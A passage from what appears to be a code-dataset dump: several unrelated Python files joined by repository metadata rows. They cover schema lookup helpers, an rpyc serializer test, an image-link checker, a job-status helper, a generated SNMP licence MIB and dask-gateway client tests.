            )
            # Fixed: the key iteration previously chained only ``base``
            # and ``top``, so groups present solely in the global schema
            # were silently dropped even though ``gl`` values were being
            # merged for shared keys.  (Duplicate keys in the chain are
            # harmless: the dict comprehension de-duplicates them.)
            for k in itertools.chain(base, top, gl)
        }

    def _get_by_id(
        self,
        obj_id: uuid.UUID,
        default: Union[so.Object_T, so.NoDefaultT, None],
        *,
        type: Optional[Type[so.Object_T]],
    ) -> Optional[so.Object_T]:
        """Resolve an id: top first, then base, then global (which also
        applies *default* handling, including raising on NoDefault)."""
        obj = self._top_schema.get_by_id(obj_id, type=type, default=None)
        if obj is None:
            obj = self._base_schema.get_by_id(
                obj_id, default=None, type=type)
        if obj is None:
            obj = self._global_schema.get_by_id(
                obj_id, default=default, type=type)
        return obj

    def _get_global(
        self,
        objtype: Type[so.Object_T],
        name: Union[str, sn.Name],
        default: Union[so.Object_T, so.NoDefaultT, None],
    ) -> Optional[so.Object_T]:
        """Look up a globally-named object, routing GlobalObject types to
        the global layer and everything else top-then-base."""
        if issubclass(objtype, so.GlobalObject):
            return self._global_schema.get_global(  # type: ignore
                objtype, name, default=default)
        else:
            obj = self._top_schema.get_global(objtype, name, default=None)
            if obj is None:
                obj = self._base_schema.get_global(
                    objtype, name, default=default)
            return obj

    def _get(
        self,
        name: Union[str, sn.Name],
        default: Union[so.Object, so.NoDefaultT, None],
        *,
        module_aliases: Optional[Mapping[Optional[str], str]],
        type: Optional[Type[so.Object_T]],
        condition: Optional[Callable[[so.Object], bool]],
        label: Optional[str],
        sourcectx: Optional[parsing.ParserContext],
    ) -> Optional[so.Object]:
        """Name-based lookup: top first, then base (which also applies
        *default* handling, including raising on NoDefault)."""
        obj = self._top_schema.get(
            name,
            module_aliases=module_aliases,
            type=type,
            default=None,
            condition=condition,
            label=label,
            sourcectx=sourcectx,
        )
        if obj is None:
            return self._base_schema.get(
                name,
                default=default,
                module_aliases=module_aliases,
                type=type,
                condition=condition,
                label=label,
                sourcectx=sourcectx,
            )
        else:
            return obj

    def has_object(self, object_id: uuid.UUID) -> bool:
        """True if any layer contains *object_id*."""
        return (
            self._base_schema.has_object(object_id)
            or self._top_schema.has_object(object_id)
            or self._global_schema.has_object(object_id)
        )

    def has_module(self, module: str) -> bool:
        """True if either schema layer defines *module* (the global layer
        holds no modules)."""
        return (
            self._base_schema.has_module(module)
            or self._top_schema.has_module(module)
        )

    def get_objects(
        self,
        *,
        exclude_stdlib: bool = False,
        exclude_global: bool = False,
        exclude_internal: bool = True,
        included_modules: Optional[Iterable[sn.Name]] = None,
        excluded_modules: Optional[Iterable[sn.Name]] = None,
        included_items: Optional[Iterable[sn.Name]] = None,
        excluded_items: Optional[Iterable[sn.Name]] = None,
        type: Optional[Type[so.Object_T]] = None,
        extra_filters: Iterable[Callable[[Schema, so.Object], bool]] = (),
    ) -> SchemaIterator[so.Object_T]:
        """Iterate over objects of all three layers with the filters."""
        return SchemaIterator[so.Object_T](
            self,
            itertools.chain(
                self._base_schema._id_to_type,
                self._top_schema._id_to_type,
                self._global_schema._id_to_type,
            ),
            exclude_global=exclude_global,
            exclude_stdlib=exclude_stdlib,
            exclude_internal=exclude_internal,
            included_modules=included_modules,
            excluded_modules=excluded_modules,
            included_items=included_items,
            excluded_items=excluded_items,
            type=type,
            extra_filters=extra_filters,
        )

    def get_modules(self) -> Tuple[s_mod.Module, ...]:
        """All modules from base and top layers, base first."""
        return (
            self._base_schema.get_modules()
            + self._top_schema.get_modules()
        )

    def get_last_migration(self) -> Optional[s_migrations.Migration]:
        """Newest migration from the top layer, falling back to base."""
        migration = self._top_schema.get_last_migration()
        if migration is None:
            migration = self._base_schema.get_last_migration()
        return migration
@functools.lru_cache()
def _get_functions(
    schema: FlatSchema,
    name: sn.Name,
) -> Optional[Tuple[s_func.Function, ...]]:
    """Fetch all functions registered under shortname *name*, or None."""
    objids = schema._shortname_to_id.get((s_func.Function, name))
    if objids is None:
        return None
    funcs = tuple(schema.get_by_id(oid) for oid in objids)
    return cast(Tuple[s_func.Function, ...], funcs)
@functools.lru_cache()
def _get_operators(
    schema: FlatSchema,
    name: sn.Name,
) -> Optional[Tuple[s_oper.Operator, ...]]:
    """Fetch all operators registered under shortname *name*, or None."""
    objids = schema._shortname_to_id.get((s_oper.Operator, name))
    if objids is None:
        return None
    return tuple(
        schema.get_by_id(oid, type=s_oper.Operator) for oid in objids
    )
@functools.lru_cache()
def _get_last_migration(
    schema: FlatSchema,
) -> Optional[s_migrations.Migration]:
    """Return the newest migration by walking the linear parent chain.

    Builds a parent -> children map, locates the single parentless root,
    and follows child links to the end.  Raises InternalServerError on
    multiple roots, a missing root, or a branching history.
    """
    migrations = cast(
        List[s_migrations.Migration],
        [
            schema.get_by_id(mid)
            for (t, _), mid in schema._globalname_to_id.items()
            if t is s_migrations.Migration
        ],
    )
    if not migrations:
        return None
    migration_map = collections.defaultdict(list)
    root = None
    for m in migrations:
        parents = m.get_parents(schema).objects(schema)
        if not parents:
            # A migration with no parents is the root; there may be
            # only one.
            if root is not None:
                raise errors.InternalServerError(
                    'multiple migration roots found')
            root = m
        for parent in parents:
            migration_map[parent].append(m)
    if root is None:
        raise errors.InternalServerError('cannot find migration root')
    latest = root
    # Follow the (expected-to-be-linear) chain to its end.
    while children := migration_map[latest]:
        if len(children) > 1:
            raise errors.InternalServerError(
                'nonlinear migration history detected')
        latest = children[0]
    return latest
| 31.513297 | 79 | 0.548037 |
acfb624b375782818ff5c331dc9d4d1183e8c4e5 | 744 | py | Python | tests/test_brine.py | pdxjohnny/rpyc | bc8f0223be8436fa77c71cda94cc6610d621a364 | [
"MIT"
] | 238 | 2020-09-02T22:26:44.000Z | 2022-03-31T17:49:55.000Z | tests/test_brine.py | pdxjohnny/rpyc | bc8f0223be8436fa77c71cda94cc6610d621a364 | [
"MIT"
] | 87 | 2020-09-02T20:10:35.000Z | 2022-03-16T16:49:47.000Z | tests/test_brine.py | pdxjohnny/rpyc | bc8f0223be8436fa77c71cda94cc6610d621a364 | [
"MIT"
] | 40 | 2020-09-13T19:53:51.000Z | 2022-03-21T09:17:48.000Z | from rpyc.core import brine
from rpyc.lib.compat import is_py_3k
import unittest
class BrineTest(unittest.TestCase):
    """Round-trip test for the brine serializer."""

    def test_brine_2(self):
        # The tuple under test is constructed via exec() so this module
        # can be byte-compiled under both Python 2 and 3: the b"" and u""
        # literals would otherwise be a SyntaxError on one of the two.
        if is_py_3k:
            # exec() with an explicit globals() dict: the assignment to
            # ``x`` lands in the module namespace, which is where the
            # references below resolve (hence the noqa markers).
            exec('''x = (b"he", 7, "llo", 8, (), 900, None, True, Ellipsis, 18.2, 18.2j + 13,
slice(1, 2, 3), frozenset([5, 6, 7]), NotImplemented, (1,2))''', globals())
        else:
            # Python 2's exec statement assigns into the local scope.
            exec('''x = ("he", 7, u"llo", 8, (), 900, None, True, Ellipsis, 18.2, 18.2j + 13,
slice(1, 2, 3), frozenset([5, 6, 7]), NotImplemented, (1,2))''')
        # dump/load must be lossless for every dumpable value.
        self.assertTrue(brine.dumpable(x))  # noqa
        y = brine.dump(x)  # noqa
        z = brine.load(y)
        self.assertEqual(x, z)  # noqa
# Allow running this test module directly with the unittest runner.
if __name__ == "__main__":
    unittest.main()
| 33.818182 | 93 | 0.538978 |
acfb62a76012c8378b25a733f7f816be43217d2d | 2,071 | py | Python | inspector.py | rukeba/img-link-inspector | 963fda0688f3de3e030f34cec50a12dbd2440d1c | [
"MIT"
] | null | null | null | inspector.py | rukeba/img-link-inspector | 963fda0688f3de3e030f34cec50a12dbd2440d1c | [
"MIT"
] | null | null | null | inspector.py | rukeba/img-link-inspector | 963fda0688f3de3e030f34cec50a12dbd2440d1c | [
"MIT"
] | null | null | null | import re
import urllib.parse
import requests
import bs4
class ImgLinkInspector(object):
    """Fetches a web page and reports the HTTP status of every image URL
    found on it.

    Keyword options:
        src_attr: alternate <img> attribute to read when ``src`` is
            missing or a ``data:`` placeholder (e.g. 'data-src' for
            lazy-loaded images).  Defaults to 'src'.
        verbose: when true, report every URL's status (not just >= 400)
            and print progress information.
    """

    def __init__(self, page_url, **kwargs):
        self.page_url = page_url
        self.src_attr = kwargs.get('src_attr', 'src')
        self.verbose = bool(kwargs.get('verbose', False))
        # Remember the page's scheme and host so scheme-relative ('//...')
        # and root-relative ('/...') URLs can be absolutized later.
        parsed_url = urllib.parse.urlparse(self.page_url)
        self.default_scheme = parsed_url.scheme
        self.default_scheme_host = f'{parsed_url.scheme}://{parsed_url.netloc}'
        # Inline data: URIs are not fetchable links and are skipped.
        self._re_ignore_images_urls = re.compile(r'^data:', re.I)

    def inspect(self):
        """Run the full pipeline; return a list of (status, url) tuples.

        Only failing URLs (status >= 400) are reported unless verbose.
        """
        html = self._load_page()
        image_urls = self._find_image_urls(html)
        if self.verbose:
            print(f'{len(image_urls)} image urls found')
        url_statuses = self._check_url_response(image_urls)
        return url_statuses

    def _load_page(self):
        """Download the page HTML; raises on an HTTP error status."""
        resp = requests.get(self.page_url)
        resp.raise_for_status()
        html = resp.text
        return html

    def _find_image_urls(self, html):
        """Collect candidate image URLs from all <img> tags.

        ``src`` is preferred; when it is missing or a ``data:`` URI, the
        configured alternate attribute (``self.src_attr``) is tried.
        Fixed: the original indexed ``el['src']`` / ``el[self.src_attr]``
        directly and raised KeyError for tags lacking those attributes;
        such tags are now simply skipped.
        """
        soup = bs4.BeautifulSoup(html, 'html.parser')
        image_urls = set()
        for el in soup.findAll('img'):
            for attr in ('src', self.src_attr):
                src = el.get(attr)
                if src and not self._re_ignore_images_urls.match(src):
                    image_urls.add(self._assert_default_scheme(src))
                    break
        return image_urls

    def _assert_default_scheme(self, url):
        """Absolutize scheme-relative and root-relative URLs against the
        inspected page; absolute URLs pass through unchanged."""
        if url.startswith('//'):
            return f'{self.default_scheme}:{url}'
        if url.startswith('/'):
            return f'{self.default_scheme_host}{url}'
        return url

    def _check_url_response(self, image_urls):
        """HEAD every URL (following redirects); collect (status, url)
        for failures, or for everything when verbose."""
        statuses = []
        for url in image_urls:
            url_resp = requests.head(url, allow_redirects=True)
            if url_resp.status_code >= 400 or self.verbose:
                statuses.append((url_resp.status_code, url))
        return statuses
acfb639e33977f4b2d4c51a91994115d2051f54f | 4,758 | py | Python | pyjobweb/jobInfo/getStatus.py | vvaradarajan/pyJobWeb | eb83ce09f9a9f9185e31e53b2fda8b56981e26af | [
"Apache-2.0"
] | 1 | 2019-03-19T12:23:53.000Z | 2019-03-19T12:23:53.000Z | pyjobweb/jobInfo/getStatus.py | vvaradarajan/pyJobWeb | eb83ce09f9a9f9185e31e53b2fda8b56981e26af | [
"Apache-2.0"
] | null | null | null | pyjobweb/jobInfo/getStatus.py | vvaradarajan/pyJobWeb | eb83ce09f9a9f9185e31e53b2fda8b56981e26af | [
"Apache-2.0"
] | null | null | null | '''
Created on Oct 15, 2016
@author: vasan
'''
import os
import errno
import json
import inspect
import csv
from jobInfo.commandHandler import cmdOutputParser
from jobInfo.dbUtils import job
class jobStatus:
'''Reads the status file and returns a json '''
flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY
## The stuff below is to help in creating the google visualization data table
    @staticmethod
    def newColumn(self,colNM,colType):
        """Build a single column descriptor dict for a Google
        Visualization DataTable ('cols' entry).
        """
        # NOTE(review): declared @staticmethod yet the first parameter is
        # named ``self`` — callers must pass a throwaway first argument,
        # e.g. jobStatus.newColumn(None, 'jobId', 'string').  Dropping the
        # parameter would change the call signature, so it is only
        # flagged here.
        col={}
        col["id"]="";col['label']=colNM;col['pattern']="";col['type']=colType
        return col
    def convertJsonLineToGoogleDataTable(self,jsonline):
        """Convert the parsed status JSON into a Google-Visualization-style
        table: [header-names, header-types, row, row, ...].

        Note: the print() calls throughout are debug output; ``cols``
        holds both the two header rows and the data rows.
        """
        #do the cols object
        print(jsonline.__class__)
        # NOTE(review): iterates every key but only the last iteration's
        # ``jobset`` survives the loop — presumably the report has exactly
        # one top-level key; confirm against the report writer.
        for key in jsonline:
            print (key, 'corresponds to', jsonline[key])
            jobset=jsonline[key]
        #explicitly put in the cols array (needs to be ordered!)
        cols=[]
        col=['jobId','idle','executing','complete']
        cols.append(col)
        col=['string','number','number','number']
        cols.append(col)
        #Now put the data in the order of the cols
        print(jobset.__class__)
        for job in jobset:
            print (job)
            row=[]
            # Order each row by the header list; missing counters are 0.
            for attr in cols[0]:
                if attr in job:
                    row.append(job[attr])
                else:
                    row.append(0)
            cols.append(row)
        print(cols)
        return cols
        # cols=[]
        # j=jsonline[0]
        # for k in j:
        #     print (k)
def getStatus(self):
try:
lf = os.open(self.lfNM, jobStatus.flags)
except OSError as e:
if e.errno == errno.EEXIST: # Failed as the file already exists.
pass
else: # Notsure what the error is, so return nunn
print("Unknown error: "+ e.errno);
return {} #return status
#Read Json from file and returnhttps://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiV_7CK193PAhVnsFQKHRZVB64QFggkMAI&url=http%3A%2F%2Fstackoverflow.com%2Fquestions%2F68645%2Fstatic-class-variables-in-python&usg=AFQjCNENgcl06PKrGi1TimZ6rpA7AYv6Mg&sig2=X2n2Jcr38nxF4oAH6tkXFA
with open(self.dfNM) as f:
jsonLine=json.load(f);
os.close(lf)
os.remove(self.lfNM)
return self.convertJsonLineToGoogleDataTable(jsonLine)
return jsonLine
def getStartJobs(self,categ): #not get but exec
self.jobCateg=categ
cmdOutputParser.threadOsCommand(self.jobRunCmd+" "+self.jobCateg)
#return the lineal time
jobList=job.getJobList(categ)
print("No jobs in categ: "+categ)
if len(jobList)==0:
print("No jobs in categ: "+categ+"\nExiting")
sys.exit(1)
lt={}
lt['linealTime'] = jobStatus.getLinealTime(jobList)
return lt
def __init__(self, config):
"""Constructor"""
self.lfNM=config['jobLockfile']
self.dfNM=config['jobRptfile']
self.jobsfNM=config['jobConfigfile']
self.jobRunCmd=config['jobRunCmd']
self.jobCateg=config['defaultJobCateg']
def getJobList(self,categ):
return self.getJobListFromDB(categ) #get JobList from file
def getJobListFromFile(self):
#read the joblist and create a json array of job objects
with open(self.jobsfNM) as f:
jobLineRdt = csv.reader(f,delimiter=',')
#The first line is #Format: jobId, jobClass, jobParams
jobArray=[]
for row in jobLineRdt:
jobrow=[]
for s in row:
if (s.startswith("#Format:") ): #process header row
jobrow.append(s[9:])
else:
jobrow.append(s)
jobArray.append(jobrow)
print (', '.join(row)) #row is a list of strings and join makes it one string
return jobArray
def getJobListFromDB(self,categ):
print (job.getJobList(categ))
return job.getJobList(categ)
def getCateg(self):
categList=[]
for s in job.getJobCategList() :
opt={}
opt["name"]=s
categList.append(opt)
return categList
@staticmethod
def getLinealTime(JobList):
return job.getLinealTime(JobList)
# Manual smoke test: run this module directly to exercise getStatus().
if __name__ == "__main__":
    # jobStatus.__init__ expects a config mapping; the old call passed three
    # positional paths and crashed with a TypeError.
    config = {
        "jobLockfile": "C:/junk/junk.lock",
        "jobRptfile": "C:/junk/report.txt",
        "jobConfigfile": "C:/junk/jobs.txt",
        "jobRunCmd": "",       # no runner needed for a read-only smoke test
        "defaultJobCateg": "",  # presumably a category name - TODO confirm
    }
    ji = jobStatus(config)
    print(inspect.getmembers(ji))
    ji.getStatus()
| 34.478261 | 304 | 0.567886 |
acfb644c980291eeeaaa0b69a7774ebb862eeeeb | 7,766 | py | Python | pysnmp-with-texts/GENLIC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/GENLIC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/GENLIC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module GENLIC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/GENLIC-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:19:27 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# NOTE(review): machine-generated by pysmi from the GENLIC-MIB ASN.1 source
# (see the header above) - regenerate from the MIB rather than hand-editing.
# Base SMI/TC symbols pulled from the already-loaded core MIB modules.
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Integer32, NotificationType, ObjectIdentity, iso, enterprises, Gauge32, IpAddress, MibIdentifier, TimeTicks, ModuleIdentity, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, Unsigned32, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "NotificationType", "ObjectIdentity", "iso", "enterprises", "Gauge32", "IpAddress", "MibIdentifier", "TimeTicks", "ModuleIdentity", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "Unsigned32", "Bits")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
# Module identity: lannet = enterprises.81, license subtree = lannet.37.
lannet = MibIdentifier((1, 3, 6, 1, 4, 1, 81))
license = ModuleIdentity((1, 3, 6, 1, 4, 1, 81, 37))
if mibBuilder.loadTexts: license.setLastUpdated('0006220000Z')
if mibBuilder.loadTexts: license.setOrganization('Lucent Technologies Inc.')
if mibBuilder.loadTexts: license.setContactInfo('Itai Zilbershtein -- izilbers@lucent.com')
if mibBuilder.loadTexts: license.setDescription('Lucent Common License MIB')
licensePerModule = MibIdentifier((1, 3, 6, 1, 4, 1, 81, 37, 1))
# licModuleIdentTable: per-slot module identifiers used when requesting licenses.
licModuleIdentTable = MibTable((1, 3, 6, 1, 4, 1, 81, 37, 1, 1), )
if mibBuilder.loadTexts: licModuleIdentTable.setStatus('current')
if mibBuilder.loadTexts: licModuleIdentTable.setDescription('Table of module identifieres used for requesting licenses')
licModuleIdentEntry = MibTableRow((1, 3, 6, 1, 4, 1, 81, 37, 1, 1, 1), ).setIndexNames((0, "GENLIC-MIB", "licModuleIdentIndex"))
if mibBuilder.loadTexts: licModuleIdentEntry.setStatus('current')
if mibBuilder.loadTexts: licModuleIdentEntry.setDescription('An entry in the table, containing data about a single modules operations.')
licModuleIdentIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: licModuleIdentIndex.setStatus('current')
if mibBuilder.loadTexts: licModuleIdentIndex.setDescription('Index which identifies the module inside the chassis for which this entry contains information. Equals the number of the slot by which the group is accessed or the stackable index.')
licModuleIdentUniqueID = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 1, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(6, 6)).setFixedLength(6)).setMaxAccess("readonly")
if mibBuilder.loadTexts: licModuleIdentUniqueID.setStatus('current')
if mibBuilder.loadTexts: licModuleIdentUniqueID.setDescription('The Unique identifier of this module. Example: the MAC Address of the agent onboard a P330 module. Must be 6 octets long.')
# licFeatureTable: per-module feature/license state.
licFeatureTable = MibTable((1, 3, 6, 1, 4, 1, 81, 37, 1, 2), )
if mibBuilder.loadTexts: licFeatureTable.setStatus('current')
if mibBuilder.loadTexts: licFeatureTable.setDescription('Table of features and their licenses as entered to each module.')
licFeatureTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1), ).setIndexNames((0, "GENLIC-MIB", "licModuleIdentIndex"), (0, "GENLIC-MIB", "licFeatureId"))
if mibBuilder.loadTexts: licFeatureTableEntry.setStatus('current')
if mibBuilder.loadTexts: licFeatureTableEntry.setDescription('An entry in the table, containing data about a particular feature on a particular module.')
licFeatureId = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 208, 209))).clone(namedValues=NamedValues(("smon", 1), ("richLayer2", 2), ("routing", 3), ("serverLoadBalance", 4), ("rfc1483", 5), ("loadBalance", 6), ("cajunViewPlus", 208), ("realNetRules", 209)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: licFeatureId.setStatus('current')
if mibBuilder.loadTexts: licFeatureId.setDescription('The basic feature type. Features numbered 208 (0xD0) and above are reserved for host-based applications. ')
licFeatureModifier = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: licFeatureModifier.setStatus('current')
if mibBuilder.loadTexts: licFeatureModifier.setDescription('The FeatureModifier field for this feature. value Set when a license is entered.')
licFeatureName = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(16, 16)).setFixedLength(16)).setMaxAccess("readonly")
if mibBuilder.loadTexts: licFeatureName.setStatus('current')
if mibBuilder.loadTexts: licFeatureName.setDescription('The name of the feature. Used by CLI commands. Must be a lowercase string without spaces. Feature Names: smon - Switch Monitoring routing - Enable routing functions rich-layer-2 - Enable Policy calssifications and actions in a Layer 2 switch server-load-balance - Load balancing server traffic. rfc-1483 - Enable RFC 1483 functions. load-balance - Enable load balancing. cajun-view-plus - host-based Network Managemnet application real-net-rules - host-based Policy Management application.')
licFeatureLicense = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 12)).clone(hexValue="0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: licFeatureLicense.setStatus('current')
if mibBuilder.loadTexts: licFeatureLicense.setDescription('The License needed for this feature. The length serves to diffrentiate between the old SMON scheme and the new versions. 9 octet string - license version 0x02 and onwards 12 octets string - old SMON license. Note that on pre-configured devices, a feature may be active without a license key (License key=0).')
licFeatureLicenseStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 81, 37, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("licensed", 1), ("unlicensed", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: licFeatureLicenseStatus.setStatus('current')
if mibBuilder.loadTexts: licFeatureLicenseStatus.setDescription('The state of the feature in terms of the licensing mechanism. State will change to licensed(1) if a valid license is enetered, or if the feature is somhow pre-configured. Note that a licensed feature may be inactive. However, an unlicened feature cannot be activated.')
# Export everything so importers of GENLIC-MIB can resolve these symbols.
mibBuilder.exportSymbols("GENLIC-MIB", licModuleIdentTable=licModuleIdentTable, licFeatureTableEntry=licFeatureTableEntry, license=license, licModuleIdentUniqueID=licModuleIdentUniqueID, licFeatureModifier=licFeatureModifier, lannet=lannet, licensePerModule=licensePerModule, licFeatureTable=licFeatureTable, licFeatureLicense=licFeatureLicense, licModuleIdentIndex=licModuleIdentIndex, licModuleIdentEntry=licModuleIdentEntry, licFeatureName=licFeatureName, licFeatureId=licFeatureId, PYSNMP_MODULE_ID=license, licFeatureLicenseStatus=licFeatureLicenseStatus)
| 141.2 | 560 | 0.785475 |
acfb6455a59a589ef56a9ed570859bf7e08e34c6 | 14,604 | py | Python | tests/test_client.py | raybellwaves/dask-gateway | b86e3066839c44801c11a51564091f59b705f342 | [
"BSD-3-Clause"
] | 69 | 2019-09-19T06:19:48.000Z | 2022-02-04T23:01:15.000Z | tests/test_client.py | raybellwaves/dask-gateway | b86e3066839c44801c11a51564091f59b705f342 | [
"BSD-3-Clause"
] | 318 | 2019-09-18T18:42:57.000Z | 2022-03-31T11:05:38.000Z | tests/test_client.py | raybellwaves/dask-gateway | b86e3066839c44801c11a51564091f59b705f342 | [
"BSD-3-Clause"
] | 61 | 2019-09-18T18:09:56.000Z | 2022-03-25T20:35:11.000Z | import time
import aiohttp
import yarl
import pytest
import dask
from dask_gateway.auth import get_auth, BasicAuth, KerberosAuth, JupyterHubAuth
from dask_gateway.client import Gateway, GatewayCluster, cleanup_lingering_clusters
from dask_gateway_server.compat import get_running_loop
from .utils_test import temp_gateway
def test_get_auth():
    """get_auth resolves auth objects, keyword names, and config entries."""
    # Pass through existing auth objects
    auth = BasicAuth()
    assert get_auth(auth) is auth
    # Auth by keyword name
    auth = get_auth("basic")
    assert isinstance(auth, BasicAuth)
    auth = get_auth("kerberos")
    assert isinstance(auth, KerberosAuth)
    # Auth from config
    config = {"gateway": {"auth": {"type": "basic", "kwargs": {}}}}
    with dask.config.set(config):
        auth = get_auth()
        assert isinstance(auth, BasicAuth)
    # Auth from config with import path
    config = {
        "gateway": {"auth": {"type": "dask_gateway.auth.BasicAuth", "kwargs": {}}}
    }
    with dask.config.set(config):
        auth = get_auth()
        assert isinstance(auth, BasicAuth)
    # Auth from config with kwargs
    config = {"gateway": {"auth": {"type": "basic", "kwargs": {"username": "bruce"}}}}
    with dask.config.set(config):
        auth = get_auth()
        assert isinstance(auth, BasicAuth)
        assert auth.username == "bruce"
    # Errors
    with pytest.raises(TypeError):
        get_auth(1)
    with pytest.raises(TypeError):
        get_auth(lambda: 1)
    with pytest.raises(ImportError):
        get_auth("dask_gateway.auth.Foo")
    with pytest.raises(ImportError):
        get_auth("not_a_real_module_name_foo_barrr")
def test_config_auth_kwargs_template_environment_vars(monkeypatch):
    """Auth kwargs in config may reference environment variables."""
    monkeypatch.setenv("TEST_USER", "bruce")
    # "{TEST_USER}" in the config value should be expanded from the env.
    auth_settings = {"type": "basic", "kwargs": {"username": "{TEST_USER}"}}
    with dask.config.set({"gateway": {"auth": auth_settings}}):
        auth = get_auth()
    assert isinstance(auth, BasicAuth)
    assert auth.username == "bruce"
def test_jupyterhub_auth(monkeypatch):
    """JupyterHub auth requires an API token, from the env or a parameter."""
    # Without JUPYTERHUB_API_TOKEN in the environment, construction fails.
    with pytest.raises(ValueError) as exc:
        get_auth("jupyterhub")
    assert "JUPYTERHUB_API_TOKEN" in str(exc.value)
    # With the env var set, the token is picked up automatically.
    monkeypatch.setenv("JUPYTERHUB_API_TOKEN", "abcde")
    auth = get_auth("jupyterhub")
    assert isinstance(auth, JupyterHubAuth)
    assert auth.api_token == "abcde"
    # An explicit parameter takes precedence over the environment.
    assert JupyterHubAuth(api_token="other").api_token == "other"
def test_client_init():
    """Gateway() resolves address/proxy/auth from config with kwarg overrides."""
    config = {
        "gateway": {
            "address": "http://127.0.0.1:8888",
            "public-address": None,
            "proxy-address": 8786,
            "auth": {"type": "basic", "kwargs": {"username": "bruce"}},
            "http-client": {"proxy": None},
        }
    }
    with dask.config.set(config):
        # Defaults
        gateway = Gateway()
        assert gateway.address == "http://127.0.0.1:8888"
        assert gateway._public_address == "http://127.0.0.1:8888"
        assert gateway.proxy_address == "gateway://127.0.0.1:8786"
        assert gateway.auth.username == "bruce"
        # Address override
        gateway = Gateway(address="http://127.0.0.1:9999")
        assert gateway.address == "http://127.0.0.1:9999"
        # Proxy address override
        gateway = Gateway(proxy_address="gateway://123.4.5.6:9999")
        assert gateway.proxy_address == "gateway://123.4.5.6:9999"
        # Auth override
        gateway = Gateway(auth="kerberos")
        assert isinstance(gateway.auth, KerberosAuth)
    config = {
        "gateway": {
            "address": None,
            "public-address": None,
            "proxy-address": 8786,
            "auth": {"type": "basic", "kwargs": {}},
            "http-client": {"proxy": None},
        }
    }
    with dask.config.set(config):
        # No address provided
        with pytest.raises(ValueError):
            Gateway()
    config["gateway"]["address"] = "http://127.0.0.1:8888"
    config["gateway"]["proxy-address"] = None
    config["gateway"]["public-address"] = "https://public.com/dask"
    with dask.config.set(config):
        g = Gateway()
        assert g.proxy_address == "gateway://127.0.0.1:8888"
        assert g._public_address == "https://public.com/dask"
def test_gateway_proxy_address_infer_port():
    """Without an explicit proxy address, the port follows the HTTP scheme."""
    with dask.config.set(gateway__proxy_address=None):
        # http defaults to port 80, https to port 443.
        for scheme, port in [("http", 80), ("https", 443)]:
            gw = Gateway("%s://localhost" % scheme)
            assert gw.proxy_address == "gateway://localhost:%d" % port
def test_gateway_addresses_template_environment_vars(monkeypatch):
    """Address config values expand {VAR} templates from the environment."""
    monkeypatch.setenv("TEST", "foobar")
    with dask.config.set(
        gateway__address="http://{TEST}:80",
        gateway__proxy_address=8785,
        gateway__public_address="/{TEST}/foo/",
    ):
        g = Gateway()
        assert g.address == "http://foobar:80"
        assert g.proxy_address == "gateway://foobar:8785"
        # Trailing slash on the public address is stripped.
        assert g._public_address == "/foobar/foo"
    with dask.config.set(gateway__proxy_address="gateway://{TEST}:8787"):
        g = Gateway("http://test.com")
        assert g.address == "http://test.com"
        assert g.proxy_address == "gateway://foobar:8787"
def test_http_client_proxy_false(monkeypatch):
    """With the http-client proxy disabled, proxy env vars are ignored."""
